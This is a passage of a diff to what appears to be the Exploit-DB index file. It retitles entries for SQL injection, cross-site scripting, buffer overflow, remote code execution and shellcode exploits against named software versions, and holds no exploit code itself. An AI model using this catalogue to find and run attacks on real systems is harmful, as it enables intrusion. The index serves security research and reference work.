Garcia",php,webapps,0 34393,platforms/php/webapps/34393.txt,"Joomla! 'com_jigsaw' Component - 'controller' Parameter Directory Traversal",2010-08-03,FL0RiX,php,webapps,0 -34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 Web Server HTTP GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0 +34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - Web Server HTTP GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0 34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial Of Service",2010-08-03,"Rodrigo Escobar",windows,dos,0 34396,platforms/php/webapps/34396.txt,"FuseTalk 3.2/4.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-07-03,"Juan Manuel Garcia",php,webapps,0 34397,platforms/asp/webapps/34397.txt,"Activedition - 'activedition/aelogin.asp' Multiple Cross-Site Scripting Vulnerabilities",2009-09-25,"Richard Brain",asp,webapps,0 @@ -31004,7 +30999,7 @@ id,file,description,date,author,platform,type,port 34413,platforms/php/webapps/34413.txt,"DiamondList - /user/main/update_settings setting[site_title] Parameter XSS",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34414,platforms/php/webapps/34414.txt,"DiamondList - /user/main/update_category category[description] Parameter XSS",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34415,platforms/php/webapps/34415.txt,"Hulihan Applications Amethyst 0.1.5 - Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -34416,platforms/php/webapps/34416.txt,"Muraus Open Blog Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps,0 +34416,platforms/php/webapps/34416.txt,"Muraus Open Blog - Multiple HTML Injection Vulnerabilities",2010-08-05,"High-Tech Bridge SA",php,webapps,0 34417,platforms/php/webapps/34417.txt,"Prado Portal 1.2 - 'page' Parameter Cross-Site Scripting",2010-08-06,"High-Tech Bridge SA",php,webapps,0 34418,platforms/php/webapps/34418.txt,"Dataface 1.0 - 'admin.php' Cross-Site Scripting",2010-08-06,MustLive,php,webapps,0 34419,platforms/multiple/webapps/34419.txt,"ntopng 1.2.0 - XSS Injection",2014-08-26,"Steffen Bauch",multiple,webapps,0 @@ -31026,14 +31021,14 @@ id,file,description,date,author,platform,type,port 34438,platforms/php/webapps/34438.txt,"MybbCentral TagCloud 2.0 - 'Topic' Field HTML Injection",2010-08-11,3ethicalhackers.com,php,webapps,0 34439,platforms/multiple/remote/34439.txt,"ServletExec - (Directory Traversal / Authentication-Bypass) Multiple Vulnerabilities",2010-08-12,"Stefano Di Paola",multiple,remote,0 34440,platforms/jsp/webapps/34440.txt,"Computer Associates Oneview Monitor 6.0 - 'doSave.jsp' Remote Code Execution",2010-08-12,"Giorgio Fedon",jsp,webapps,0 -34441,platforms/php/webapps/34441.txt,"JForum 2.08 BBCode Color Tag HTML Injection",2010-05-13,"Giorgio Fedon",php,webapps,0 +34441,platforms/php/webapps/34441.txt,"JForum 2.08 - BBCode Color Tag HTML Injection",2010-05-13,"Giorgio Fedon",php,webapps,0 34442,platforms/windows/dos/34442.html,"Kylinsoft InstantGet 2.08 - ActiveX Control 'ShowBar' Method Buffer Overflow",2009-09-19,the_Edit0r,windows,dos,0 34443,platforms/php/webapps/34443.txt,"PaoLink 1.0 - 'scrivi.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 34444,platforms/php/webapps/34444.txt,"RSSMediaScript - 'index.php' Cross-Site Scripting",2009-09-16,Moudi,php,webapps,0 34445,platforms/php/webapps/34445.txt,"LiveStreet 0.2 - Comment Topic Header XSS",2009-08-31,Inj3ct0r,php,webapps,0 34446,platforms/php/webapps/34446.txt,"LiveStreet 0.2 - include/ajax/blogInfo.php asd Parameter XSS",2009-08-31,Inj3ct0r,php,webapps,0 34447,platforms/php/webapps/34447.py,"Plogger 1.0-RC1 - Authenticated Arbitrary File Upload",2014-08-28,b0z,php,webapps,80 -34448,platforms/multiple/remote/34448.rb,"Firefox WebIDL Privileged Javascript Injection",2014-08-28,Metasploit,multiple,remote,0 +34448,platforms/multiple/remote/34448.rb,"Firefox - WebIDL Privileged Javascript Injection",2014-08-28,Metasploit,multiple,remote,0 34449,platforms/multiple/webapps/34449.txt,"ManageEngine DeviceExpert 5.9 - User Credential Disclosure",2014-08-28,"Pedro Ribeiro",multiple,webapps,0 34450,platforms/php/webapps/34450.py,"ActualAnalyzer Lite 2.81 - Unauthenticated Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 34451,platforms/php/webapps/34451.py,"PhpWiki - Remote Command Execution",2014-08-28,"Benjamin Harris",php,webapps,80 @@ -31051,7 +31046,7 @@ id,file,description,date,author,platform,type,port 34464,platforms/php/webapps/34464.txt,"SyntaxCMS - 'rows_per_page' Parameter SQL Injection",2010-08-10,"High-Tech Bridge SA",php,webapps,0 34467,platforms/php/webapps/34467.txt,"Edit-X PHP CMS - 'search_text' Parameter Cross-Site Scripting",2010-08-13,"High-Tech Bridge SA",php,webapps,0 34468,platforms/php/webapps/34468.html,"Mystic 0.1.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps,0 -34469,platforms/php/webapps/34469.html,"Onyx Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps,0 +34469,platforms/php/webapps/34469.html,"Onyx - Multiple Cross-Site Scripting Vulnerabilities",2010-08-10,"High-Tech Bridge SA",php,webapps,0 34470,platforms/php/webapps/34470.txt,"Beex - news.php navaction Parameter XSS",2009-09-01,Moudi,php,webapps,0 34471,platforms/php/webapps/34471.txt,"Beex - partneralle.php navaction Parameter XSS",2009-09-01,Moudi,php,webapps,0 34472,platforms/php/webapps/34472.txt,"PHPMass Real Estate - 'view_map.php' Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 @@ -31071,7 +31066,7 @@ id,file,description,date,author,platform,type,port 34486,platforms/php/webapps/34486.txt,"PHPCMS2008 - 'download.php' Information Disclosure",2009-10-19,Securitylab.ir,php,webapps,0 34487,platforms/php/webapps/34487.txt,"Facil Helpdesk - kbase/kbase.php URI XSS",2009-08-07,Moudi,php,webapps,0 34489,platforms/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow Exploit (SEH)",2014-08-31,mr.pr0n,windows,local,0 -34492,platforms/asp/webapps/34492.txt,"Online Work Order Suite Lite Edition Multiple Cross-Site Scripting Vulnerabilities",2009-08-10,Moudi,asp,webapps,0 +34492,platforms/asp/webapps/34492.txt,"Online Work Order Suite Lite Edition - Multiple Cross-Site Scripting Vulnerabilities",2009-08-10,Moudi,asp,webapps,0 34493,platforms/php/webapps/34493.txt,"PPScript - 'shop.htm' SQL Injection",2009-08-03,MizoZ,php,webapps,0 34494,platforms/php/webapps/34494.txt,"ViArt Helpdesk - products.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 34495,platforms/php/webapps/34495.txt,"ViArt Helpdesk - article.php category_id Parameter XSS",2009-08-10,Moudi,php,webapps,0 @@ -31156,7 +31151,7 @@ id,file,description,date,author,platform,type,port 34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 - Remote Root Code Execution",2014-09-09,eF,linux,remote,80 34603,platforms/windows/dos/34603.py,"Adobe Acrobat and Reader 9.3.4 - 'acroform_PlugInMain' Memory Corruption",2010-09-06,ITSecTeam,windows,dos,0 34596,platforms/php/webapps/34596.txt,"Pligg CMS 1.0.4 - SQL Injection / Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0 -34597,platforms/php/webapps/34597.txt,"Datetopia Buy Dating Site Cross-Site Scripting",2010-09-10,Moudi,php,webapps,0 +34597,platforms/php/webapps/34597.txt,"Datetopia Buy Dating Site - Cross-Site Scripting",2010-09-10,Moudi,php,webapps,0 34598,platforms/php/webapps/34598.txt,"SZNews 2.7 - 'printnews.php3' Remote File Inclusion",2009-09-11,"kurdish hackers team",php,webapps,0 34599,platforms/php/webapps/34599.txt,"tourismscripts HotelBook - 'hotel_id' Parameter Multiple SQL Injection",2009-09-10,Mr.SQL,php,webapps,0 34600,platforms/php/webapps/34600.txt,"Match Agency BiZ - edit_profile.php important Parameter XSS",2009-09-11,Moudi,php,webapps,0 @@ -31169,7 +31164,7 @@ id,file,description,date,author,platform,type,port 34609,platforms/php/webapps/34609.txt,"MySource Matrix - 'char_map.php' Multiple Cross-Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0 34610,platforms/php/webapps/34610.txt,"zenphoto 1.3 - zp-core/full-image.php a Parameter SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0 34611,platforms/php/webapps/34611.txt,"Zenphoto 1.3 - zp-core/admin.php Multiple Parameter XSS",2010-09-07,"Bogdan Calin",php,webapps,0 -34805,platforms/php/webapps/34805.txt,"StatsCode Multiple Cross-Site Scripting Vulnerabilities",2009-07-09,"599eme Man",php,webapps,0 +34805,platforms/php/webapps/34805.txt,"StatsCode - Multiple Cross-Site Scripting Vulnerabilities",2009-07-09,"599eme Man",php,webapps,0 34806,platforms/php/webapps/34806.txt,"JNM Guestbook 3.0 - 'index.php' Cross-Site Scripting",2009-07-09,Moudi,php,webapps,0 34807,platforms/php/webapps/34807.txt,"JNM Solutions DB Top Sites 1.0 - 'vote.php' Cross-Site Scripting",2009-07-08,Moudi,php,webapps,0 34808,platforms/php/webapps/34808.txt,"Rapidsendit Clone Script - 'admin.php' Insecure Cookie Authentication Bypass",2009-07-08,NoGe,php,webapps,0 @@ -31182,7 +31177,7 @@ id,file,description,date,author,platform,type,port 34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS - image.php image Parameter XSS",2010-09-14,"Valentin Hoebel",php,webapps,0 34621,platforms/unix/remote/34621.c,"Mozilla Firefox 3.6.8 - 'Math.random()' Cross Domain Information Disclosure",2010-09-14,"Amit Klein",unix,remote,0 34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal",2010-09-15,"Bogdan Calin",windows,remote,0 -34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80 +34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80 34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS",2014-09-11,Provensec,php,webapps,80 34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 - (index.php contacts_id param)SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion",2014-09-11,Vulnerability-Lab,ios,webapps,9900 @@ -31212,7 +31207,7 @@ id,file,description,date,author,platform,type,port 34652,platforms/php/webapps/34652.txt,"e-Soft24 PTC Script 1.2 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0 34653,platforms/php/webapps/34653.txt,"e107 0.7.23 - Multiple SQL Injection",2010-09-17,"High-Tech Bridge SA",php,webapps,0 34654,platforms/windows/remote/34654.c,"SWiSH Max3 - DLL Loading Arbitrary Code Execution",2010-09-20,anT!-Tr0J4n,windows,remote,0 -34655,platforms/php/webapps/34655.txt,"Open Classifieds Multiple Cross-Site Scripting Vulnerabilities",2009-08-28,Moudi,php,webapps,0 +34655,platforms/php/webapps/34655.txt,"Open Classifieds - Multiple Cross-Site Scripting Vulnerabilities",2009-08-28,Moudi,php,webapps,0 34656,platforms/php/webapps/34656.txt,"x10 MP3 Automatic Search Engine 1.6.5 - includes/video_ad.php pic_id Parameter XSS",2009-08-29,Moudi,php,webapps,0 34657,platforms/php/webapps/34657.txt,"x10 MP3 Automatic Search Engine 1.6.5 - linkvideos_listing.php category Parameter XSS",2009-08-29,Moudi,php,webapps,0 34658,platforms/php/webapps/34658.txt,"x10 MP3 Automatic Search Engine 1.6.5b - templates/header1.php id Parameter XSS",2009-08-29,Moudi,php,webapps,0 @@ -31227,7 +31222,7 @@ id,file,description,date,author,platform,type,port 34668,platforms/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",windows,remote,80 34669,platforms/multiple/remote/34669.rb,"Railo - Remote File Inclusion",2014-09-15,Metasploit,multiple,remote,80 34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer - Arbitrary File Upload",2014-09-15,Metasploit,multiple,remote,8400 -34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,Metasploit,java,remote,9000 +34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager - Authentication Bypass",2014-09-15,Metasploit,java,remote,9000 34672,platforms/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - CSRF",2014-09-15,"William Costa",linux,webapps,8090 34673,platforms/php/webapps/34673.txt,"Tukanas Classifieds 1.0 - 'index.php' SQL Injection",2009-08-28,Moudi,php,webapps,0 34674,platforms/php/webapps/34674.txt,"WebStatCaffe - stat/mostvisitpage.php nodayshow Parameter XSS",2009-08-29,Moudi,php,webapps,0 @@ -31278,7 +31273,7 @@ id,file,description,date,author,platform,type,port 34822,platforms/windows/local/34822.c,"Microsoft Windows - Local Procedure Call (LPC) Local Privilege Escalation",2010-09-07,yuange,windows,local,0 34823,platforms/windows/remote/34823.c,"Dupehunter Professional 9.0.0.3911 - 'Fwpuclnt.dll' DLL Loading Arbitrary Code Execution",2010-10-08,anT!-Tr0J4n,windows,remote,0 34824,platforms/php/webapps/34824.txt,"Lantern CMS - '11-login.asp' Cross-Site Scripting",2010-10-08,"High-Tech Bridge SA",php,webapps,0 -34825,platforms/php/webapps/34825.html,"Curverider Elgg 1.0 Templates HTML Injection",2009-06-22,lorddemon,php,webapps,0 +34825,platforms/php/webapps/34825.html,"Curverider Elgg 1.0 - Templates HTML Injection",2009-06-22,lorddemon,php,webapps,0 34826,platforms/php/webapps/34826.html,"OPEN IT OverLook 5 - 'title.php' Cross-Site Scripting",2010-10-08,"Anatolia Security",php,webapps,0 34720,platforms/windows/dos/34720.pl,"Fast Image Resizer 098 - Local Crash PoC",2014-09-20,"niko sec",windows,dos,0 34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0 @@ -31292,7 +31287,7 @@ id,file,description,date,author,platform,type,port 34729,platforms/windows/dos/34729.py,"Seafile-server 3.1.5 - Remote DoS",2014-09-20,"nop nop",windows,dos,0 34736,platforms/php/webapps/34736.txt,"EZArticles - 'articles.php' Cross-Site Scripting",2009-08-20,Moudi,php,webapps,0 34737,platforms/php/webapps/34737.txt,"EZodiak - 'index.php' Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 -34738,platforms/php/webapps/34738.txt,"GejoSoft Image Hosting Community Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 +34738,platforms/php/webapps/34738.txt,"GejoSoft Image Hosting Community - Cross-Site Scripting",2009-07-20,Moudi,php,webapps,0 34923,platforms/linux/local/34923.c,"Linux Kernel < 3.16.1 - Remount FUSE Local Root Exploit",2014-10-09,"Andy Lutomirski",linux,local,0 34740,platforms/php/webapps/34740.txt,"MyWeight 1.0 - user_addfood.php date Parameter XSS",2009-07-20,Moudi,php,webapps,0 34741,platforms/php/webapps/34741.txt,"MyWeight 1.0 - user_forgot_pwd_form.php info Parameter XSS",2009-07-20,Moudi,php,webapps,0 @@ -31331,7 +31326,7 @@ id,file,description,date,author,platform,type,port 34776,platforms/php/webapps/34776.txt,"Hotscripts Type PHP Clone Script - lostpassword.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0 34777,platforms/cgi/remote/34777.rb,"GNU Bash - Environment Variable Command Injection (Metasploit)",2014-09-25,"Shaun Colley",cgi,remote,0 34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add map in /etc/hosts file (google.com 127.1.1.1) shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0 -34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80 +34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN - ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80 34783,platforms/php/webapps/34783.txt,"Scriptsez Ultimate Poll - 'demo_page.php' Cross-Site Scripting",2009-07-16,Moudi,php,webapps,0 34784,platforms/php/webapps/34784.txt,"Micro CMS 1.0 - 'name' Field HTML Injection",2010-09-28,"Veerendra G.G",php,webapps,0 34785,platforms/php/webapps/34785.txt,"phpMyFAQ 2.6.x - 'index.php' Cross-Site Scripting",2010-09-28,"Yam Mesicka",php,webapps,0 @@ -31346,7 +31341,7 @@ id,file,description,date,author,platform,type,port 34794,platforms/cgi/webapps/34794.txt,"Intellicom Netbiter webSCADA Products - 'read.cgi' Multiple Remote Security Vulnerabilities",2010-10-01,"Eugene Salov",cgi,webapps,0 34795,platforms/php/webapps/34795.txt,"WebAsyst Shop-Script - 'index.php' Cross-Site Scripting",2009-07-09,Vrs-hCk,php,webapps,0 34796,platforms/multiple/remote/34796.txt,"Oracle MySQL < 5.1.50 - Privilege Escalation",2010-08-03,"Libing Song",multiple,remote,0 -34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e Cross-Site Scripting",2010-10-04,"Kerem Kocaer",php,webapps,0 +34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e - Cross-Site Scripting",2010-10-04,"Kerem Kocaer",php,webapps,0 34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 - 'car' Parameter SQL Injection",2010-09-27,RoAd_KiLlEr,php,webapps,0 34781,platforms/php/webapps/34781.txt,"WordPress All In One WP Security Plugin 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80 34798,platforms/php/webapps/34798.txt,"ITS SCADA Username - SQL Injection",2010-10-04,"Eugene Salov",php,webapps,0 @@ -31385,7 +31380,7 @@ id,file,description,date,author,platform,type,port 34843,platforms/php/webapps/34843.txt,"TWiki 5.0 - bin/login Multiple Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0 34844,platforms/windows/remote/34844.c,"STDU Explorer 1.0.201 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-10-15,anT!-Tr0J4n,windows,remote,0 34845,platforms/php/webapps/34845.txt,"PHP Photo Vote 1.3F - 'page' Parameter Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 -34846,platforms/windows/remote/34846.txt,"httpdx 1.4.5 dot Character Remote File Disclosure",2009-10-09,Dr_IDE,windows,remote,0 +34846,platforms/windows/remote/34846.txt,"httpdx 1.4.5 - dot Character Remote File Disclosure",2009-10-09,Dr_IDE,windows,remote,0 34847,platforms/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R - 'subitems.php' Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0 34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Parameter Local File Inclusion / Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 @@ -31400,7 +31395,7 @@ id,file,description,date,author,platform,type,port 34858,platforms/php/webapps/34858.txt,"RBS Change Complet Open Source 3.6.8 - CSRF",2014-10-02,"Krusty Hack",php,webapps,80 34860,platforms/linux/remote/34860.py,"GNU bash 4.3.11 - Environment Variable dhclient Exploit",2014-10-02,@0x00string,linux,remote,0 34861,platforms/php/webapps/34861.txt,"PHPCompta/NOALYSS 6.7.1 5638 - Remote Command Execution",2014-10-02,Portcullis,php,webapps,80 -34862,platforms/linux/remote/34862.rb,"Pure-FTPd External Authentication Bash Environment Variable Code Injection",2014-10-02,Metasploit,linux,remote,21 +34862,platforms/linux/remote/34862.rb,"Pure-FTPd - External Authentication Bash Environment Variable Code Injection",2014-10-02,Metasploit,linux,remote,21 34863,platforms/php/webapps/34863.txt,"TestLink 1.9.11 - Multiple SQL Injection",2014-10-02,Portcullis,php,webapps,80 34864,platforms/asp/webapps/34864.txt,"Epicor Enterprise 7.4 - Multiple Vulnerabilities",2014-10-02,"Fara Rustein",asp,webapps,443 34865,platforms/multiple/webapps/34865.txt,"Moab < 7.2.9 - Authorization Bypass",2014-10-02,"MWR InfoSecurity",multiple,webapps,0 @@ -31477,7 +31472,7 @@ id,file,description,date,author,platform,type,port 34941,platforms/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 - 'q' Parameter Cross-Site Scripting",2009-05-25,SmOk3,php,webapps,0 34942,platforms/php/webapps/34942.txt,"Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"dave b",php,webapps,0 34943,platforms/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",windows,remote,0 -34944,platforms/php/webapps/34944.txt,"SmartOptimizer Null Character Remote Information Disclosure",2010-11-01,"Francois Harvey",php,webapps,0 +34944,platforms/php/webapps/34944.txt,"SmartOptimizer - Null Character Remote Information Disclosure",2010-11-01,"Francois Harvey",php,webapps,0 34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 - Directory Traversal",2010-11-01,"John Leitch",multiple,remote,0 34946,platforms/php/webapps/34946.txt,"cformsII 11.5/13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0 34947,platforms/php/webapps/34947.txt,"CMS WebManager-Pro 7.4.3 - Cross-Site Scripting / SQL Injection",2010-10-30,MustLive,php,webapps,0 @@ -31523,8 +31518,8 @@ id,file,description,date,author,platform,type,port 34992,platforms/php/webapps/34992.txt,"Drupal Core 7.0 <= 7.31 - SQL Injection (SA-CORE-2014-005) (2)",2014-10-17,"Claudio Viviani",php,webapps,0 34993,platforms/php/webapps/34993.php,"Drupal Core 7.32 - SQL Injection (PHP)",2014-10-17,"Dustin Dörr",php,webapps,0 34997,platforms/windows/remote/34997.txt,"DServe - Multiple Cross-Site Scripting Vulnerabilities",2010-11-16,Axiell,windows,remote,0 -34998,platforms/linux/remote/34998.txt,"Eclipse 3.6.1 Help Server help/index.jsp URI XSS",2010-11-16,"Aung Khant",linux,remote,0 -34999,platforms/linux/remote/34999.txt,"Eclipse 3.6.1 Help Server help/advanced/content.jsp URI XSS",2010-11-16,"Aung Khant",linux,remote,0 +34998,platforms/linux/remote/34998.txt,"Eclipse 3.6.1 - Help Server help/index.jsp URI XSS",2010-11-16,"Aung Khant",linux,remote,0 +34999,platforms/linux/remote/34999.txt,"Eclipse 3.6.1 - Help Server help/advanced/content.jsp URI XSS",2010-11-16,"Aung Khant",linux,remote,0 35000,platforms/windows/dos/35000.txt,"SAP Netweaver Enqueue Server - Denial of Service",2014-10-17,"Core Security",windows,dos,3200 35001,platforms/windows/remote/35001.txt,"SAP NetWeaver 7.0 - SQL Monitor Multiple Cross-Site Scripting Vulnerabilities",2010-11-17,a.polyakov,windows,remote,0 35002,platforms/windows/remote/35002.html,"VLC Media Player 1.1.x - Calling Convention Remote Buffer Overflow",2010-11-02,shinnai,windows,remote,0 @@ -31570,7 +31565,7 @@ id,file,description,date,author,platform,type,port 35048,platforms/asp/webapps/35048.txt,"Techno Dreams Articles & Papers Package 2.0 - 'ArticlesTablelist.asp' SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 35049,platforms/asp/webapps/35049.txt,"Techno Dreams FAQ Manager Package 1.0 - 'faqlist.asp' SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 35050,platforms/php/webapps/35050.txt,"Alguest 1.1 - 'start' Parameter SQL Injection",2010-12-06,"Aliaksandr Hartsuyeu",php,webapps,0 -35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server Directory Traversal",2010-12-06,Pr0T3cT10n,windows,remote,0 +35051,platforms/windows/remote/35051.txt,"Freefloat FTP Server - Directory Traversal",2010-12-06,Pr0T3cT10n,windows,remote,0 35052,platforms/php/webapps/35052.txt,"Magento Server MAGMI Plugin - Remote File Inclusion",2014-10-25,"Parvinder Bhasin",php,webapps,0 35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 35055,platforms/windows/remote/35055.py,"Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060)",2014-10-25,"Mike Czumak",windows,remote,0 @@ -31599,7 +31594,7 @@ id,file,description,date,author,platform,type,port 35073,platforms/php/webapps/35073.txt,"WordPress CP Multi View Event Calendar 1.01 Plugin - SQL Injection",2014-10-27,"Claudio Viviani",php,webapps,80 35074,platforms/windows/local/35074.py,"Free WMA MP3 Converter 1.8 - (.wav) Buffer Overflow",2014-10-27,metacom,windows,local,0 35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series - Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0 -35076,platforms/multiple/webapps/35076.py,"HP Operations Agent Remote XSS iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383 +35076,platforms/multiple/webapps/35076.py,"HP Operations Agent - Remote XSS iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383 35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass and Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0 35078,platforms/unix/remote/35078.rb,"Centreon - SQL Injection / Command Injection",2014-10-27,Metasploit,unix,remote,80 35079,platforms/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation",2014-10-27,"Brandon Perry",jsp,webapps,8585 @@ -31625,7 +31620,7 @@ id,file,description,date,author,platform,type,port 35099,platforms/php/webapps/35099.txt,"Enalean Tuleap 7.2 - XXE File Disclosure",2014-10-28,Portcullis,php,webapps,80 35100,platforms/php/webapps/35100.txt,"Enalean Tuleap 7.4.99.5 - Remote Command Execution",2014-10-28,Portcullis,php,webapps,80 35101,platforms/windows/local/35101.rb,"Windows - TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,Metasploit,windows,local,0 -35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Blind SQL Injection (Pre-Auth)",2014-10-28,tintinweb,php,webapps,80 +35102,platforms/php/webapps/35102.py,"Tapatalk for vBulletin 4.x - Pre-Auth Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80 35214,platforms/multiple/webapps/35214.txt,"Subex Fms 7.4 - Unauthenticated SQLi",2014-11-11,"Anastasios Monachos",multiple,webapps,0 35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass",2014-10-29,gamehacker,hardware,remote,0 35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - (.wax) Buffer Overflow/DoS EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0 @@ -31645,7 +31640,7 @@ id,file,description,date,author,platform,type,port 35118,platforms/php/webapps/35118.txt,"phpRS - 'model-kits.php' SQL Injection",2010-12-16,KnocKout,php,webapps,0 35119,platforms/windows/remote/35119.txt,"Alt-N WebAdmin 3.3.3 - Remote Source Code Information Disclosure",2010-12-17,wsn1983,windows,remote,0 35120,platforms/php/webapps/35120.txt,"Radius Manager 3.6 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps,0 -35121,platforms/php/webapps/35121.txt,"Social Share Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps,0 +35121,platforms/php/webapps/35121.txt,"Social Share - Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps,0 35122,platforms/php/webapps/35122.txt,"Social Share - 'postid' Parameter SQL Injection",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0 35123,platforms/php/webapps/35123.txt,"Mafya Oyun Scrpti - 'profil.php' SQL Injection",2010-12-20,"DeadLy DeMon",php,webapps,0 35124,platforms/php/webapps/35124.txt,"FreeNAS 0.7.2.5543 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2010-12-21,db.pub.mail,php,webapps,0 @@ -31670,9 +31665,9 @@ id,file,description,date,author,platform,type,port 35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 - Cross-Site Scripting",2010-12-23,"Gjoko Krstic",multiple,remote,0 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' Parameter SQL Injection",2010-12-27,Dr.NeT,php,webapps,0 35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0 -35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal",2010-12-24,anonymous,linux,remote,0 +35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business - Directory Traversal",2010-12-24,anonymous,linux,remote,0 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0 -35150,platforms/php/webapps/35150.php,"Drupal Core < 7.32 